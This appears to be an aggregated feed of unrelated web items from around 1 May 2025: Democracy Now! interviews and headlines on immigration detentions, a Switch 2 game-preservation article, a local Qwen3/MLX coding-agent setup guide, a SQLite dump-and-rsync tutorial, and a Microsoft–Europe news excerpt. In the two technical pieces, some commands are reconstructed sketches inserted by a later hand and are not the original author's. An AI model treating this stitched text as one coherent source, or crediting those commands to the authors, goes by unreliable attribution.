Mr. Gutiérrez, could you tell us, when did you learn that he had been transferred to El Salvador?
WILMER GUTIÉRREZ:
[translated] I found out that they had sent him to El Salvador when he contacted me Saturday morning. And from that point on, I had no further communication with him. When they were sending flights to El Salvador, we learned that they had taken a group of Venezuelans. At that time, they had not sent any planes deporting Venezuelans to their home country. We inquired, but couldn’t obtain any information until a list of names of everyone who was deported came out, and my son’s name was on that list.
JUAN GONZÁLEZ:
Do you feel betrayed by the government, that the same government that allowed you to come into the United States with humanitarian parole has now sent your son to another country to prison?
WILMER GUTIÉRREZ:
[translated] Yes, indeed. Because we came here with a dream, we did not think that this injustice was ever going to happen. My son has not committed any crime. He never appeared in front of a court. He was not charged with a crime or had a trial. No, they grabbed him and then put him on a plane and took him to El Salvador, and that’s where they have sent others. They were kidnapped, because they did not go through a formal process, nor did they sign any papers saying where they were going. We hope that if they put him on a plane, they would return my son to Venezuela, where we have family. And look where he ended up, where his rights as a human being are being violated right now. They shattered our dreams.
AMY GOODMAN:
I want to bring Ethar El-Katatney into this conversation, the editor-in-chief of Documented. As we hear this utterly painful story that Wilmer conveys about his teenage son being taken to the notorious Salvadoran prison, I want to go back to that night, February 24th. As your reporter at Documented has told this story, interviewed the cousin, explain exactly what he saw and heard the agents doing.
ETHAR EL-KATATNEY:
Thanks, Amy, for having me. Thank you for sharing your story so honestly.
And I think, before I just get to that, I just wanted to add that, you know, when we hear about the numbers, and you hear 238 kind of deported, it’s kind of sometimes easy to forget that these are real human lives and real impact. You know, an investigation showed that out of those 238 young people, nearly 75% of them actually have no criminal record, right? And we at Documented are continuing to follow similar stories, other young men in their early twenties who also have no criminal records and who were also deported.
So, part of what we do at Documented which is so unique, which is we are directly connected to immigrant communities, right? And we actually film the story through WhatsApp. Raz, our reporter, is in a group where she actually managed to get in touch with Wilmer. So, when we sent her to the community, obviously, developing kind of trust, being able to discuss with his family.
So, Luis, who has actually left now their apartment, out of fear that he would also be kind of caught up in a collateral arrest, which is exactly what we think was happening here, he was upstairs and actually saw it through a window. He said he saw nearly a dozen agents kind of gathering around. And what really made this so unique, which is he heard one agent talking about how this isn’t who they were looking for, and another agent say, “But take him anyway.”
And I would say that kind of pervasive fear that we’re seeing now in immigrant communities, which is, even if you have no criminal record, even if you have status, even if you have a legal case, even if the Supreme Court has argued that you have a right to argue against your deportation, you might still be taken away. So, this case, as tragic as it is, we’re seeing it play out in multiple ways across the country and in New York.
AMY GOODMAN:
So, talk about how the administration has responded. I mean, even when they publicly say, as in the case of Kilmar, they publicly say they made a mistake, they also say they’re not going to bring back Kilmar Abrego Garcia. They said it in court to a judge. But talk about what the — how the Trump administration has responded, and what access that Wilmer has to the courts right now.
ETHAR EL-KATATNEY:
Yeah. I would say that in this case, you know, the administration talked about it being an administrative error — right? — and having no right, which is a step kind of even beyond —
AMY GOODMAN:
In Kilmar’s case.
ETHAR EL-KATATNEY:
In Kilmar’s case, that it was an administrative error and that we can’t do anything. So, even if you have the courts now saying that they actually have to facilitate his return, the administration actually isn’t doing anything. And now you have kind of a search and proceedings to see, like: Are they actually stopping this?
I would say, in Wilmer’s case, he’s gotten a lot of media attention. But up until this day, even though we talked directly to, you know, politicians across the spectrum — we directly had an exclusive statement from Alexandria Ocasio-Cortez expressing kind of, you know, their disillusionment, their disappointment, their kind of “we will take action” — to this day, there really has been no update on the case. The lawyer in the case involved has no updates. We still don’t actually know if he’s fully — what his situation is, what he is. And again, to remind everybody, he’s 19 years old, Venezuelan, deported to a prison not even in his country. And despite the media attention, there really has been no update as of yet.
AMY GOODMAN:
Wilmer, I know how incredibly hard this is for you. Talk about your decision to speak out.
WILMER GUTIÉRREZ:
[translated] Well, I am doing this so that the violation that they did to all Venezuelans, including my son, is known throughout the world, because it is really anti-human that they grab the person and treat them as they please and violate their rights. If they do not want us here, they should deport them to their native country, not send them to a prison, because they are not terrorists. They are not gang members. They do not belong to any gang or anything like that.
So they are violating my son’s rights, and they are damaging his mind. My son is still a child. His mentality has not matured yet. And right now they are damaging his mind. Imagine what he is feeling at this moment there. Every day he wakes up knowing that they have not yet taken him out of that place where they have kidnapped him, where they are violating his human rights.
I decided to speak out because I really want this to be heard, even by the president of El Salvador himself. And we ask him to respect those Venezuelans, because my son has nothing to do with all this. He has not had any problem with that country. And the president of El Salvador should release him.
AMY GOODMAN:
Wilmer, talk about the risk you’re taking in coming forward. Are you afraid that you could be next, even if your son was mistakenly taken?
WILMER GUTIÉRREZ:
[translated] Well, fear is something that they instill in us, but I am not afraid, because if you look at what is happening to my son, and if something happens to me, the only thing that matters is that at least I made people aware of what has happened to my son. I made them understand that the government is violating the laws. And if they do something against people like myself who are advocating for our relatives, then they will realize that what they are doing is a violation of human rights, because they do not want to respect the laws. They are violating them. The courts told them not to fly those planes to El Salvador, and they still did it. We can imagine what is going to happen going forward if they do not put a stop to this government, because they are violating all the laws and doing whatever they want.
AMY GOODMAN:
Have you ever been apart from Merwil this long, for two months?
WILMER GUTIÉRREZ:
[translated] Merwil and I have always been practically like brothers, always together, until now that they have separated us.
AMY GOODMAN:
Do you have hope that he’ll be released, that you’ll see him here again?
WILMER GUTIÉRREZ:
[translated] Merwil and I have lived together all our lives. He has always been with me, and the only time we weren’t together is when he was in classes in high school focusing on his studies. He would always walk with me, work with me. When we were still living in Venezuela, we were always together. And as I’m telling you now, we had never been separated, until now they have separated us. And it is very hard.
AMY GOODMAN:
If you could talk to your son right now, if you could talk to Merwil, look right into the camera, and what would you say to him?
WILMER GUTIÉRREZ:
[translated] Well, my message to Merwil, if he hears me, he is to be strong. God is with us, and he needs to know that we are doing everything possible to get him out of there soon. His family in Venezuela is doing everything they can, just like me here. I am making my voice heard, so that it is heard and reaches the ears of everyone, and that justice is done, because, I told you from my heart, he is not a criminal. Not all Venezuelans are doing what Trump’s government says we are doing. And I hope they have a little respect for that, too. If they want to send everyone to their home country, do it with due process, not how they are doing it, as if we were criminals. Even animals don’t deserve that. They treat us as if we were a commodity. And from my heart, I tell Merwil that we are doing everything possible and that we will be together soon.
AMY GOODMAN:
Wilmer Gutiérrez, father of 19-year-old Merwil Gutiérrez, who was detained by Immigration and Customs Enforcement, by ICE agents, outside his apartment here in New York in the Bronx on February 24th and was sent to El Salvador, despite having an open asylum case in the U.S. He has not been heard from since. At CECOT, they’re kept incommunicado. We’ll link to the report on this case by Documented, headlined “ICE Took His Son from Their Bronx Home. Now His 19-Year-Old Is in Bukele’s Mega-Prison in El Salvador.” And you can go to our full interview with Wilmer about Merwil at our website in Spanish at democracynow.org/es.
When we come back, as the United States and Ukraine sign a new rare earth minerals deal, we’ll speak to the environmental journalist Antonia Juhasz. Her new piece, “Is Trump’s 'Minerals Deal' a Fossil Fuel Shakedown?” Stay with us.
[break]
AMY GOODMAN:
“Power in a Union,” performed by Billy Bragg in our Democracy Now! studio in 2011.
"I Am Not Afraid of You": Mohsen Mahdawi's Defiant Message to Trump After Release from ICE Jail in VT
Democracy Now!
www.democracynow.org
2025-05-01 13:13:26
Columbia University student and Palestinian activist Mohsen Mahdawi has been released on bail by a Vermont judge after more than two weeks in U.S. immigration custody. “I am saying it clear and loud to President Trump and his Cabinet: I am not afraid of you,” he told supporters as he lef...
This is a rush transcript. Copy may not be in its final form.
NERMEEN SHAIKH:
We begin today’s show in Vermont, where Columbia University student and Palestinian activist Mohsen Mahdawi was released after more than two weeks in U.S. immigration custody. Mahdawi is a green card holder from Palestine who was born and raised in a refugee camp in the occupied West Bank. He was arrested on April 14th when he appeared for what he was told would be a citizenship interview. Mahdawi had participated in the Palestinian solidarity protests at Columbia last year. He was also president of the Columbia University Buddhist Association.
He was freed on bail on Wednesday by U.S. District Judge Geoffrey Crawford, who criticized the Trump administration’s handling of the case. In his ruling, Crawford wrote that Mahdawi had made, quote, “substantial claims that his detention is the result of a retaliation for protected speech that he engaged in as a college student on the Columbia campus.” Crawford went on to write, quote, “The court also considers the extraordinary setting of this case and others like it. Legal residents — not charged with crimes or misconduct — are being arrested and threatened with deportation for stating their views on the political issues of the day. Our nation has seen times like this before, especially during the Red Scare and Palmer Raids of 1919-1920 that led to the deportation of hundreds of people suspected of anarchist or communist views,” Crawford wrote.
AMY GOODMAN:
After Mohsen Mahdawi left the federal courthouse in Burlington, Vermont, he addressed supporters.
MOHSEN MAHDAWI:
And we send a clear message, as well, that if we have faith in our beliefs, unshakable beliefs, which is the belief that justice is inevitable, we will not fear anyone, because our fight is a fight for love, is a fight for democracy, is a fight for humanity. And I am saying it clear and loud to President Trump and his Cabinet: I am not afraid of you. …
Never give up on the idea that justice will prevail and that we have to come together to bring our voices and our hearts and raise them, not only for America, not only for this system of democracy that has checks and balances — and this court is part of it — but also for our humanity. We have to restore and reform the international order and abide by international law as the first step towards justice. We must stand up for humanity, because the rest of the world, not only Palestine, is watching us, and what is going to happen in America is going to affect the rest of the world.
I will end up by saying to my people in Palestine: I feel your pain, I see you suffering, and I see the freedom, and it is very, very soon. Free, free Palestine.
AMY GOODMAN:
Columbia University student and Palestinian activist Mohsen Mahdawi, speaking in Burlington, Vermont, Wednesday after he was freed after over two weeks in an immigration jail.
We’re joined now by a member of his legal team, Shezza Abboushi Dallal. She’s a staff attorney with the CLEAR project at CUNY School of Law.
Shezza, thank you so much for being with us. I know you’ve just returned from Vermont, where you were with Mohsen. Can you talk about the significance of what the judge ruled, and what are the conditions of Mohsen’s release?
SHEZZA ABBOUSHI DALLAL:
Thank you for having me, Amy.
I can’t overstate the significance of this ruling and the fact that Mohsen walked free yesterday and wakes up today in his home in Vermont, not in an ICE detention facility being punished for speaking out for Palestinian lives and freedom and against the genocide in Gaza. The judge yesterday ruled — ordered him released on bail. And this is, you know, release on his own recognizance, so he will be able to return to his home in Vermont, continue his studies at Columbia University, complete his undergraduate degree and continue on to a master’s program in the fall, and continue his advocacy for Palestinian life and dignity and freedom. And that’s of paramount importance to him.
And it was of paramount importance to the judge, too. The judge acknowledged that, you know, this is on a backdrop of a chapter of U.S. history that is repressive and evocative of moments before, where the government attempts to wield the immigration system, detention, to punish people for their First Amendment protected speech, for their political advocacy. And the judge situated his decision on that backdrop, in that context.
NERMEEN SHAIKH:
Shezza, as you said, he can come back to New York. He can return to his studies at Columbia, begin his master’s degree next year. Are there any other restrictions on his movement? In other words, he can come from Vermont to New York, but can he go anywhere else? And what is the remaining immigration case against him?
SHEZZA ABBOUSHI DALLAL:
So, he’s released pending the culmination of his federal litigation, so his habeas litigation in federal court in Vermont. And so, the conditions reflect that. You know, his court case is in Vermont, so he needs to stay around close to the court, close to the court’s jurisdiction, in order to see that process through. And that’s what that’s going to look like.
NERMEEN SHAIKH:
And the Trump administration initially did want to move him, as well, Mohsen, to the same Louisiana immigration jail that Mahmoud Khalil — two other students — Rümeysa Öztürk are held in? How come he was not sent to Louisiana, but to Vermont instead?
SHEZZA ABBOUSHI DALLAL:
That’s exactly right. The administration was playing the same card and attempting to do the same exact thing that they did with Mahmoud Khalil, Rümeysa Öztürk, Badar Khan Suri. They took him, abducted him at his naturalization interview. In the final moments after he had signed, saying that he would take an oath to the Constitution, masked men entered the room and abducted him. And then they attempted to swiftly take him to the airport in order to commence a route towards Louisiana.
And the only thing that stopped him is Mohsen’s legal team’s intervention. They filed the habeas petition before they had the opportunity to put him on a flight. And in fact, they took him all the way to the airport and missed a flight out from Burlington, Vermont, at the very last moment. So, we had the benefit of having learned what the Trump administration’s playbook is on all of these cases, to whisk people, abduct them, take them away from their communities into fora that are favorable for the government, and then present a series of delay tactics in their federal court proceedings on the basis of the fact that they are now in another state, like Louisiana.
And so, ultimately, Mohsen was able to remain in his home state of Vermont surrounded by his community. And anybody who’s seen footage or had the fortune of being at court or in front of court yesterday in the District of Vermont was able to see the power of that community and how, you know, people showed up in outrage at what is happening to Mohsen and all the other people, like Mahmoud and Rümeysa and Badar Khan Suri, who do not have the benefit of being in their home state and are still waiting to have their motions for release heard by the respective federal courts that they are in.
AMY GOODMAN:
And so, in the case of Rümeysa, the Fulbright scholar from Tufts, the international graduate student, a federal judge has ruled her case must be heard in Vermont, but she is still in Louisiana, being held there because she was moved there. Shezza, so, Mohsen gets to come to New York for graduation at Columbia University?
SHEZZA ABBOUSHI DALLAL:
Yes, he does.
AMY GOODMAN:
I want to thank you very much for being with us, Shezza Abboushi Dallal, staff attorney with the CLEAR project at CUNY School of Law and a member of Mohsen Mahdawi’s legal defense team. She’s just back from Vermont, here in New York, as she was with him yesterday as he was released.
When we come back, today is May Day, massive protests planned across the country. We’ll talk to a New York father whose 19-year-old son was detained in the Bronx, then flown with 230 other Venezuelans to a notorious mega-prison in El Salvador, where he’s being held incommunicado. Stay with us.
[break]
AMY GOODMAN:
Mohsen Mahdawi singing “Spirit of Life” with his supporters after he was released Wednesday in Burlington, Vermont, from an ICE jail.
Headlines for May 1, 2025
Democracy Now!
www.democracynow.org
2025-05-01 13:00:00
“I Am Not Afraid of You”: Mohsen Mahdawi Sends Message to Trump After Release from ICE Detention, UNRWA Warns Lives of Gaza’s Children in the Balance as Israeli Blockade Stretches into Third Month, Israeli News Investigation Confirms Biden Administration Did Not Try to End Genocide...
“I Am Not Afraid of You”: Mohsen Mahdawi Sends Message to Trump After Release from ICE Detention
May 01, 2025
Image Credit: Courtesy of Ellen Kaye
A federal judge in Vermont has granted bail and released from ICE jail Palestinian Columbia University student Mohsen Mahdawi while he challenges the Trump administration’s efforts to deport him for joining protests against Israel’s assault on Gaza. U.S. District Judge Geoffrey Crawford ruled the Trump administration failed to show why Mahdawi should remain in confinement, condemning “chilling action by the government intended to shut down debate.” Mohsen Mahdawi emerged from the courthouse to a jubilant crowd of supporters, both arms in the air, holding up the V for victory sign with his hands — also the gesture for peace.
Mohsen Mahdawi: “And I am saying it clear and loud to President Trump and his Cabinet: I am not afraid of you.”
Mahdawi also asked the crowd to join him in singing “We Shall Overcome.” Mahdawi was jailed by ICE in April after appearing for what he was told would be a naturalization test. He was a lead organizer in Columbia’s Gaza solidarity protests. We’ll get the latest on his case after headlines with a member of Mohsen Mahdawi’s legal defense team.
UNRWA Warns Lives of Gaza’s Children in the Balance as Israeli Blockade Stretches into Third Month
May 01, 2025
Israel’s military is continuing its unrelenting attacks on Gaza, killing at least 18 Palestinians today. Israel has killed at least 2,300 Palestinians since it unilaterally shattered the ceasefire in mid-March, and more than 64,000 Palestinians since October 2023.
The assault continued as the U.N. Palestinian refugee agency, UNRWA, warned the lives of 1 million Palestinian children in Gaza are on the line as Israel’s total blockade on the territory enters its 61st day. Some 3,000 aid trucks are lined up at Gaza’s border but unable to enter. The blockade has compounded a healthcare crisis, with no medicines or equipment entering Gaza, and patients unable to leave for treatment elsewhere. This is the mother of a sick 3-year-old child being treated at Nasser Hospital in Khan Younis.
Dalia Abu Mohsen: “Doctors prescribe treatments that aren’t even available to get from the pharmacies here. My daughter needs this medicine, but it’s not available. It’s not available anywhere in Gaza’s pharmacies. It has to come from outside, and the occupation has closed the crossing and refuses to let medicines through.”
This comes as arguments continue at the International Court of Justice over Israel’s obligations to provide aid to Gaza. A U.S. State Department lawyer on Wednesday defended Israel’s ban on UNRWA.
Joshua Simmons: “UNRWA is not the only option for providing humanitarian assistance in Gaza. In sum, there is no legal requirement that an occupying power permit a specific third state or international organization to conduct activities in occupied territory that would compromise its security interest.”
Israeli News Investigation Confirms Biden Administration Did Not Try to End Genocide in Gaza
May 01, 2025
Israel’s Channel 13 has aired a report detailing how the administration of former President Joe Biden allowed Israel to carry out its slaughter in Gaza with total impunity, with one senior official admitting it amounted to “killing and destroying for the sake of killing and destroying.”
Fighting Near Damascus Kills 30 People; Israel Launches Airstrike on Syria
May 01, 2025
In Syria, at least 30 people have been killed in recent days amid violent clashes between government forces and armed groups on the outskirts of Damascus. Israel intervened by launching air attacks on Syria, claiming it was defending the local Druze community. Syria immediately condemned “all forms of foreign intervention.” The transitional Syrian government, which came to power after the ouster of President Bashar al-Assad in December, has said it has restored order in the region and is committed to protecting all communities in Syria.
U.S. and Ukraine Sign Deal for Joint Natural Resources Investment Fund
May 01, 2025
U.S. and Ukrainian officials signed a deal late Wednesday that will give the U.S. a stake in Ukraine’s mineral reserves, as part of a joint investment fund with Kyiv. Details of the deal have yet to be released, including any guarantees of U.S. security assistance for Ukraine. Trump has sought to frame the agreement as repayment for U.S. military aid to Ukraine since Russia’s invasion in February 2022. The Ukrainian parliament will still need to ratify the deal. Treasury Secretary Scott Bessent spoke after signing the agreement.
Treasury Secretary Scott Bessent: “Today’s agreement signals clearly to Russian leadership that the Trump administration is committed to a peace process centered on a free, sovereign and prosperous Ukraine over the long term. It’s time for this cruel and senseless war to end.”
We’ll have more on this story later in the show with investigative journalist Antonia Juhasz.
CNN: Trump Administration in Talks to Send Immigrants and Asylum Seekers to Libya, Rwanda
May 01, 2025
The Trump administration has spoken to leaders of Libya and Rwanda about the possibility of sending immigrants with criminal records to those two countries. That’s according to CNN, which reports the U.S. is also seeking a so-called safe third country agreement that would allow the U.S. to send asylum seekers to Libya, including people with no criminal records.
Trump Repeats Lies About Abrego Garcia, Says He Could Bring Him Back from El Salvador But Will Not
May 01, 2025
President Trump said in an ABC News interview he has the power to bring back a Maryland father the U.S. government admitted to expelling to an El Salvador prison “in error,” but that he will not do so, despite court orders mandating the return of Kilmar Abrego Garcia. Trump was interviewed by Terry Moran.
President Donald Trump: “This is not an innocent, wonderful gentleman from Maryland.”
Terry Moran: “I’m not saying he’s a good guy. It’s about the rule of law. The order from the Supreme Court stands, sir.”
President Donald Trump: “He came into our country illegally.”
Terry Moran: “You could get him back. There’s a phone on this desk.”
President Donald Trump: “I could.”
Terry Moran: “You could pick it up, and with all” —
President Donald Trump: “I could.”
Terry Moran: — “the power of the presidency, you could call up the president of El Salvador and say, 'Send him back,' right now.”
President Donald Trump: “And if he were the gentleman that you say he is, I would do that.”
The comments contradict previous White House statements that the U.S. has no power to return Abrego Garcia. During the interview, Trump grew increasingly agitated and repeatedly interrupted Terry Moran to falsely claim that Abrego Garcia had tattoos on his knuckles reading “M–S–1–3,” a reference to the MS-13 gang. In fact, those characters were photoshopped into a picture of tattooed symbols on Abrego Garcia’s left hand shared by the White House on social media.
Venezuelans Fearing Deportation to El Salvador Send SOS Message from Texas Immigration Jail
May 01, 2025
In Texas, a group of 31 Venezuelan men facing possible deportation to El Salvador’s CECOT prison — notorious for its torture and human rights abuses — used their bodies to spell out a cry for help Monday after they spotted a news drone flying above the immigration jail where they’re being held. The men formed the letters S-O-S in the courtyard of the Bluebonnet Detention Facility, which is operated by the for-profit Management and Training Corporation.
Federal Judge Temporarily Blocks Florida Police from Acting as Immigration Agents
May 01, 2025
A federal judge in Miami has ordered Florida police departments to stop deputizing officers to act as immigration enforcement agents. U.S. District Judge Kathleen Williams’s order came as she prepared to issue a preliminary injunction against a new state law that makes it a misdemeanor for undocumented immigrants to enter Florida by eluding immigration agents.
Federal Judge Restricts Border Patrol in California After Agents Targeted Day Laborers and Farmworkers
May 01, 2025
In California, a federal judge has issued a preliminary injunction barring Border Patrol officers from stopping people without “reasonable suspicion” that they’re undocumented, and preventing them from making warrantless arrests unless they have credible evidence a person is likely to flee. The injunction follows reports that Border Patrol agents carrying out raids in California’s Central Valley rounded up day laborers and farmworkers, regardless of their actual immigration status, rather than fulfilling their mission of arresting immigrants with serious criminal backgrounds.
Burkina Faso Protesters Rally in Defense of Interim President After Alleged Coup Attempt
May 01, 2025
In Burkina Faso, thousands of people rallied in support of interim President Ibrahim Traoré Wednesday, after military rulers said they foiled a plot to overthrow his transitional government. Traoré seized power after a 2022 coup and moved to end military ties with former colonizer France. Protesters also condemned recent comments by General Michael Langley, head of the U.S. military’s Africa Command, who accused Traoré of using Burkina Faso’s gold reserves to benefit himself rather than the people. This is a protester in Ouagadougou.
Salifou Ouédraogo: “Words like 'democracy,' 'human rights,' no one can teach that in Africa. The African continent was the first continent that produced democracy, but not that of the West, which consists of burning countries, burning continents that do not think like them. Here we are today so that our country remains standing, so that our continent remains standing.”
Panamanian Protesters Condemn Deal to Station U.S. Troops Around Panama Canal
May 01, 2025
Protesters took to the streets of Panama City Wednesday to condemn the signing of a memorandum between the U.S. and Panama that would allow U.S. troops to deploy around the Panama Canal for military training.
Camila Aybar: “We protest because they have stomped over the sovereignty of entire generations who have fought. They dumped our sovereignty to the trash by signing a memorandum of understanding that allows foreign military presence in Panama. Down with the memorandum! Down with the memorandum! Sovereign Panama!”
President Trump has repeatedly threatened to “take back” the Panama Canal.
Rights Groups Demand Justice for Murdered Environmentalist Marco Antonio Suástegui
May 01, 2025
In Mexico, rights groups are demanding justice for Marco Antonio Suástegui, an environmental activist from Guerrero state who was shot two weeks ago and died on Friday. Suástegui helped lead the successful grassroots resistance against the La Parota hydroelectric dam project, which would have devastated the local environment and community.
Swarthmore Students Set Up Encampment to Demand Divestment from Israel
May 01, 2025
Image Credit: Jewish Voice for Peace Philly
In Pennsylvania, students at Swarthmore College set up a new protest encampment, naming the site the “Hossam Shabat Liberated Zone,” in honor of the 23-year-old Palestinian journalist killed by Israel in Gaza in March. Students are demanding Swarthmore “divest from Israeli occupation, aggression, and apartheid, and declare itself a sanctuary campus.”
May Day Protests Across U.S. Take Aim at Trump’s Anti-Worker, Anti-Immigrant Policies
May 01, 2025
Tens of thousands of people are taking to the streets across the country for May Day, International Workers’ Day. Over 1,000 actions in more than 1,000 cities will protest the Trump administration’s policies. Worker-led demonstrations are also taking place in countries across the globe.
Game preservationists have been giving their opinions on Nintendo Switch 2’s new Game-Key Cards.
Game-Key Cards are Nintendo’s new branding for cartridges that still require the game to be downloaded from the Switch 2 online store before the game can be played. The cartridge doesn’t contain the game data; rather, it’s simply a ‘key’ that enables a download.
“Game-key cards are different from regular game cards, because they don’t contain the full game data,” Nintendo’s own description says. “Instead, the game-key card is your ‘key’ to downloading the full game to your system via the internet. After it’s downloaded, you can play the game by inserting the game-key card into your system and starting it up like a standard physical game card.”
So far the vast majority of third-party Switch 2 games are Game-Key Cards, with only a few exceptions such as Cyberpunk 2077 and the Western version of Daemon X Machina: Titanic Scion.
The issue some players have with Game-Key Cards is that, because the cartridges don’t contain the full game content, they may become unplayable if the Switch 2 shop servers ever close down in the distant future and no longer provide the necessary downloads.
Most third-party Switch 2 games on the Yodobashi site are Game-Key Cards (as noted by the white bar on the bottom of the box).
In a new report by GamesIndustry.biz, several people involved in game preservation and re-releases have given their views on the situation.
Stephen Kick, CEO of Nightdive Studios (which specialises in modern remasters of older, often out-of-print games), said that “seeing Nintendo do this is a little disheartening”, adding: “You would hope that a company that big, that has such a storied history, would take preservation a little more seriously.”
Videogame Heritage Society co-founder Professor James Newman is somewhat less convinced that Game-Key Cards will be a major issue, noting that it’s rare for a game on a cartridge to still be the same game years after release.
“Even when a cartridge does contain data on day one of release, games are so often patched, updated and expanded through downloads that the cart very often loses its connection to the game, and functions more like a physical copy protection dongle for a digital object,” he explained.
Meanwhile, Paul Dyson, director of the International Center for the History of Electronic Games at The Strong Museum in New York, said the move to a future where all games are digital is “inevitable”, and that Nintendo has in fact been “in some ways, the slowest of the major console producers to be going there”.
How to vibe code for free: Running Qwen3 on your Mac, using MLX
This command will both download and serve the model (change the port to whatever you want, and be ready to download tens of gigabytes of data):
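The command itself didn’t survive in this copy of the post, so here is a minimal sketch of the kind of invocation that produces the log line below, assuming the mlx-lm package and the mlx-community model build used later in this guide:

# Install the MLX LM tooling (Apple Silicon Macs only; assumed package)
pip install mlx-lm

# First run downloads the weights from Hugging Face (tens of GB),
# then serves an OpenAI-compatible API on the chosen port
mlx_lm.server --model mlx-community/Qwen3-30B-A3B-8bit --port 8082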
After the download is done you should see something like:
2025-05-01 13:56:26,964 - INFO - Starting httpd at 127.0.0.1 on port 8082...
Meaning your model is ready to receive requests. Time to configure it in localforge!
Configure Localforge
Get your latest Localforge copy at https://localforge.dev (either npm install for any platform, or there are DMG and ZIP files available for OSX and Windows).
Once running, open settings and set it up like this:
1) In the provider list, add a provider
I have added two providers: one is Ollama for a weak model, and the other is for MLX Qwen3.
a) Ollama provider settings:
Choose name: LocalOllama
Choose ollama from provider types
No settings required
Important prerequisite:
You need to have Ollama installed on your machine and serving some sort of model, preferably gemma3:latest.
This model is needed for simple auxiliary interactions, such as the agent figuring out what is going on, but not for the serious work.
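If you don’t have Ollama set up yet, a minimal sketch (the gemma3 tag is the one this guide assumes; any small instruct model should work):

# Install Ollama from https://ollama.com, then pull the helper model
ollama pull gemma3
# Ollama usually runs as a background service on port 11434;
# start it manually only if it isn't already running
ollama serve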
b) Qwen provider settings:
Choose any provider name, such as qwen3:mlx:30b
Choose openai as the provider type, because we are going to be using the OpenAI v1 API
For the API key, put something like "not-needed"
For the API URL, put http://127.0.0.1:8082/v1/ (note the port you used in previous steps)
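As a quick sanity check (not part of the original steps), you can confirm the MLX server answers OpenAI-style requests before wiring up Localforge; the model name here assumes the 8-bit build downloaded earlier:

curl http://127.0.0.1:8082/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model": "mlx-community/Qwen3-30B-A3B-8bit", "messages": [{"role": "user", "content": "hello"}]}'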
2) Create a custom agent
After you’ve made your provider, make a custom agent! Go to the Agents tab in settings, click +Add Agent, type in a name like qwen3-agent, and then click the pencil icon to edit your agent.
This will open a large window; in it, you care about the Main and Auxiliary cards at the top (ignore the Expert card; it can be anything or empty).
For Main, put in your Qwen provider, and as the model name type in mlx-community/Qwen3-30B-A3B-8bit (or whatever you downloaded from the mlx-community).
For Auxiliary, choose your LocalOllama provider, and for the model put in gemma3:latest.
You can leave the agent prompt the same for now, although it may make sense to simplify it for Qwen.
In the tools section you can unselect the browser tools to keep things simpler, although this is optional.
Using Your New Agent
Now that this is done, press Command+S, close the agent editor, and then close settings.
You should land in the main chat window; at the very top there is a select box saying “select agent”.
Choose your new agent (qwen3-agent).
Your agent is ready to use tools!
I typed in something simple like:
"use LS tool to show me files in this folder"
And it did!
Qwen3 successfully running the LS tool through Localforge
And here's a website created by Qwen3:
A website created by Qwen3 using Localforge
Conclusion
This may require a bit more experimenting, such as simplifying the system prompt or tinkering with MLX settings and model choices, but it is definitely possible to get some autonomous code generation running on YOUR MAC, totally free of charge!
Happy tinkering!
Published 1 May 2025
A faster way to copy SQLite databases between computers
As the project matures and the database grows, this gets slower and less reliable. Downloading a 250MB database from my web server takes about a minute over my home Internet connection, and that’s pretty small – most of my databases are multiple gigabytes in size.
I’ve been trying to make these copies go faster, and I recently discovered a neat trick.
What really slows me down is my indexes. I have a lot of indexes in my SQLite databases, which dramatically speed up my queries, but also make the database file larger and slower to copy. (In one database, there’s an index which single-handedly accounts for half the size on disk!)
The indexes don’t store anything unique – they just duplicate data from other tables to make queries faster. Copying the indexes makes the transfer less efficient, because I’m copying the same data multiple times. I was thinking about ways to skip copying the indexes, and I realised that SQLite has built-in tools to make this easy.
Dumping a database as a text file
SQLite allows you to dump a database as a text file. If you use the .dump command, it prints the entire database as a series of SQL statements. This text file can often be significantly smaller than the original database.
The dump stores each index as a single CREATE INDEX statement rather than a second copy of the data, which means I’m only storing each value once, rather than the many times it may be stored across the original table and my indexes. This is how the text file can be smaller than the original database.
If you want to reconstruct the database, you pipe this text file back to SQLite:
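The snippet didn’t survive in this copy, so here’s a minimal sketch of both directions, with placeholder file names:

# Dump the database as a series of SQL statements
sqlite3 my_database.db .dump > my_database.db.txt

# Rebuild a fresh database from the dump
cat my_database.db.txt | sqlite3 my_restored_database.db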
To give you an idea of the potential savings, here’s the relative disk size for one of my databases.
File                                                           Size on disk
original SQLite database                                       3.4 GB
text file (sqlite3 my_database.db .dump)                       1.3 GB
gzip-compressed text (sqlite3 my_database.db .dump | gzip -c)  240 MB
The gzip-compressed text file is 14× smaller than the original SQLite database – that makes downloading the database much faster.
My new ssh+rsync command
Rather than copying the database directly, now I create a gzip-compressed text file on the server, copy that to my local machine, and reconstruct the database. Like so:
# Create a gzip-compressed text file on the server
ssh username@server "sqlite3 my_remote_database.db .dump | gzip -c > my_remote_database.db.txt.gz"

# Copy the gzip-compressed text file to my local machine
rsync --progress username@server:my_remote_database.db.txt.gz my_local_database.db.txt.gz

# Remove the gzip-compressed text file from my server
ssh username@server "rm my_remote_database.db.txt.gz"

# Uncompress the text file
gunzip my_local_database.db.txt.gz

# Reconstruct the database from the text file
cat my_local_database.db.txt | sqlite3 my_local_database.db

# Remove the local text file
rm my_local_database.db.txt
A database dump is a stable copy source
This approach fixes another issue I’ve had when copying SQLite databases.
If it takes a long time to copy a database and it gets updated midway through, rsync may give me an invalid database file. The first half of the file is pre-update, the second half is post-update, and they don’t match. When I try to open the database locally, I get an error:
database disk image is malformed
By creating a text dump before I start the copy operation, I’m giving rsync a stable copy source. That text dump isn’t going to change midway through the copy, so I’ll always get a complete and consistent text file.
This approach has saved me hours when working with large databases, and made my downloads both faster and more reliable. If you have to copy around large SQLite databases, give it a try.
Microsoft gets twitchy over talk of Europe's tech independence
Microsoft is responding to mounting "geopolitical and trade volatility" between the US administration and governments in Europe by pledging privacy safeguards for customers worried about using American hyperscalers, and vowing to fight the US government in court to protect Euro customers' data if needed.
Under Trump 2.0, some Europeans fear that storing their data in the bit barns of Microsoft, Google and AWS is no longer safe, a concern voiced to The Register in late February by Bert Hubert, a part-time technical adviser to the Dutch Electoral Council.
Dutch Parliamentarians have since passed eight motions that urge the government to abandon US-made technology for local alternatives. European techies and lobbyists are pressing European Commission President Ursula von der Leyen and Executive Vice-President for Tech Sovereignty Henna Virkkunen to create a sovereign infrastructure.
Microsoft President Brad Smith acknowledges this, and the importance of the region for his employer, in a blog post today, saying "our economic reliance on Europe has always run deep.
"We recognize that our business is critically dependent on sustaining the trust of customers, countries, and governments across Europe. We respect European values, comply with European laws, and actively defend Europe's cybersecurity. Our support for Europe has always been – and always will be – steadfast.
